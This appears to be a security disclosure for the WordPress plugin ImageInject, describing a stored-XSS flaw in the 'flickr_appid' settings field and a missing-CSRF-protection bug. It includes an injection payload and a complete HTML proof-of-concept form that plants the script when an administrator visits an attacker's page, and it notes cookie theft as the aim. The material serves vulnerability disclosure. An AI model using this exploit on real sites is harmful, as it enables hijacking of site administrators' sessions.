Well ,sir ,I just found a Stored-XSS bug and a CSRF bug here.
ADLab of Venustech
The report link to the wordpress-form is missing, because the manager do not wish to put the public in danger ,I'll just write some details here.
Stored-XSS
When the admin user click the "Save All Settings" button in the ImageInject setting page, we'll post some data to:
http://localhost/wordpress/wp-admin/options-general.php?page=wpdf-options
But when I pentest the parameter in this plugin, I found when I write something into this point, it does not filter well.
Weak data parameter:
flickr_appid=test'"><svg/onload=console.log(/xss_at_image_inject_appid/)><'"
CSRF
Well, the stored-xss here need to combined with a csrf bug. Because no csrf protection here, we can cheat the admin user to visit the evil html on the evil site.
POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wordpress/wp-admin/options-general.php?page=wpdf-options" method="POST">
<input type="hidden" name="flickr_enabled" value="1" />
<input type="hidden" name="flickr_appid" value="test'"><svg/onload=console.log(/xss_at_image_inject/)><'"" />
<input type="hidden" name="flickr_license" value="test" />
<input type="hidden" name="flickr_sort" value="relevance" />
<input type="hidden" name="pixabay_enabled" value="1" />
<input type="hidden" name="pixabay_image_type" value="all" />
<input type="hidden" name="general_save_images" value="1" />
<input type="hidden" name="general_feat_img_size" value="medium" />
<input type="hidden" name="general_default_align" value="none" />
<input type="hidden" name="general_attr_location" value="caption" />
<input type="hidden" name="general_items_per_req" value="40" />
<input type="hidden" name="advanced_img_template" value="<img title="{title} by {author}" alt="{keyword} photo" src="{srs}" />" />
<input type="hidden" name="advanced_attr_template" value="<small>Photo by <a href="{link}" target="_blank">{author}</a> {cc_icon}</small>" />
<input type="hidden" name="advanced_attr_template_multi" value="<small>Photos by {linklist}</small>" />
<input type="hidden" name="advanced_filename_template" value="{filename}_{keyword}" />
<input type="hidden" name="save_options" value="Save All Settings" />
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
In a word, if the manager could be cheated to visit my evil html on my site, I can get the manager's cookie easily, or do something more evilly.
Well, by the way, I just test the bug in the wordpress 4.9.1 and the latest version of the wp-plugin ImageInject.

